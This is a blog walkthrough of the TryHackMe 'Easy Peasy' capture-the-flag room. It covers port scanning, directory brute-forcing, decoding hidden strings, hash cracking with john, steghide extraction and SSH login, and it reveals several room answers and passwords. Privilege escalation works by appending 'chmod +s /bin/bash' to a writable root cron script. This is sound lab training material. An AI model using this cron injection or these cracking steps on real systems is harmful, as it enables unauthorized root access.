DEV Community

Laach_
Laach_

Posted on • Edited on

Easy Peasy - THM

Machine Info

Difficulty: Easy🟩
Link: HERE
Avg time: 45 Minutes
OS: Linux

Description: Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.

Task 1

Enumeration starts with nmap.

sudo nmap -Pn -sV -sC -n -T4 -p- -oN scan.txt 10.113.130.85
Enter fullscreen mode Exit fullscreen mode

nmap

Three ports are open:

  • 80/tcp - HTTP
  • 6498/tcp - SSH
  • 65524/tcp - HTTP

Question 1

How many ports are open? Answer: 3

Question 2

What is the version of nginx? Answer: 1.16.1

Question 3

What is running on the highest port? Answer: Apache

Task 2

Port 80 serves the nginx default page.

nginx

INFO: Feroxbuster was used instead of gobuster, but both commands are provided.

Running:

feroxbuster -u 'http://[IP]' --wordlist /usr/share/dirb/wordlists/common.txt 
# or 
gobuster dir -u 'http://[IP]' -w /usr/share/dirb/wordlists/common.txt
Enter fullscreen mode Exit fullscreen mode

feroxbuster

Scan reveals robots.txt, but it contains nothing useful. There is also hidden/, which displays a creepy image. Source code reveals nothing. Ferox also finds hidden/whatever/, which shows a mountain landscape. The page source contains a paragraph with a hidden attribute.

<!DOCTYPE html>
<html>
    <head>
        <title>dead end</title>
        <style>
            body {
                background-image: url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg");
                background-repeat: no-repeat;
                background-size: cover;
                width: 35em;
                margin: 0 auto;
                font-family: Tahoma, Verdana, Arial, sans-serif;
            }
        </style>
    </head>
    <body>
        <center>
            <p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>
        </center>
    </body>
</html>
Enter fullscreen mode Exit fullscreen mode

Decoding it with CyberChef gives flag{REDACTED}.

Port 65524 shows the Apache default page. Source code contains another hidden paragraph.

<p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>
Enter fullscreen mode Exit fullscreen mode

The hint suggests Base encoding. Trying all Base variants in CyberChef shows that only Base62 produces readable output. It decodes to /n0th1ng3ls3m4tt3r. On the same page, another flag is embedded in the Apache page HTML.

<li>
    They are activated by symlinking available
    configuration files from their respective
    Fl4g 3 : flag{REDACTED}
    *-available/ counterparts. These should be managed
    by using our helpers
    <tt>
        a2enmod,
        a2dismod,
    </tt>
    <tt>
        a2ensite,
        a2dissite,
    </tt>
    and
    <tt>
        a2enconf,
        a2disconf
    </tt>. See their respective man pages for detailed information.
</li>
Enter fullscreen mode Exit fullscreen mode

Visiting /n0th1ng3ls3m4tt3r shows a page with a 'matrix' image and a hash.

hash
Running john with the provided wordlist fails, most likely because the wrong format is used. To fix this, john is run against every format that hashid suggested.

for f in Snefru-256 Raw-SHA256 RIPEMD-256 HAVAL-256-3 gost gost-crypto Raw-SHA3-256 skein-256 skein-512-256; do john hash.txt --wordlist=~/Desktop/easypeasy.txt --format=$f ; done
Enter fullscreen mode Exit fullscreen mode

John cracks the hash. The format is GOST, a Russian alternative to SHA256.

cracked

The cracked password matches the filename of the image on the page, suggesting steganography. It is used as a passphrase to extract secrettext.txt from the image.

steghide extract -sf binarycodepixabay.jpg
Enter fullscreen mode Exit fullscreen mode

extracted

The file contains username boring in plain text and a password in binary.

01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
Enter fullscreen mode Exit fullscreen mode

The binary decodes to iconvertedmypasswordtobinary. Logging in via SSH as boring and reading /home/boring/user.txt reveals the user flag.

User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}
Enter fullscreen mode Exit fullscreen mode

The flag looks like a Caesar or Vigenère cipher. Cipher Identifier identifies it as Caesar. Trying each shift manually, shift 13 decodes it to flag{REDACTED}.

INFO: ROT13 is simply the same as Ceasar cipher with 13 shifts.

The room description mentions vulnerable cronjobs, so /etc/crontab is checked.

* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh
Enter fullscreen mode Exit fullscreen mode

Root runs .mysecretcronjob.sh every minute. The file is writable and owned by boring, so a SUID bit can be set on /bin/bash.

cron file

The following payload is appended to the script.

echo 'chmod +s /bin/bash' >> /var/www/.mysecretcronjob.sh
Enter fullscreen mode Exit fullscreen mode

After the cronjob fires, running

bash -p
Enter fullscreen mode Exit fullscreen mode

gives a root shell.

Question 1

Using GoBuster, find flag 1. Answer: flag{REDACTED}

Question 2

Further enumerate the machine, what is flag 2? Answer: flag{REDACTED}

Question 3

Crack the hash with easypeasy.txt, What is the flag 3? Answer: flag{REDACTED}

Question 4

What is the hidden directory? Answer: /n0th1ng3ls3m4tt3r (PEAK Reference to Metallica)

Question 5

Using the wordlist that provided to you in this task crack the hash what is the password? Answer: mypasswordforthatjob

Question 6

What is the password to login to the machine via SSH? Answer: iconvertedmypasswordtobinary

Question 7

What is the user flag? Answer: flag{REDACTED}

Question 8

What is the root flag? Answer: flag{REDACTED}

Top comments (0)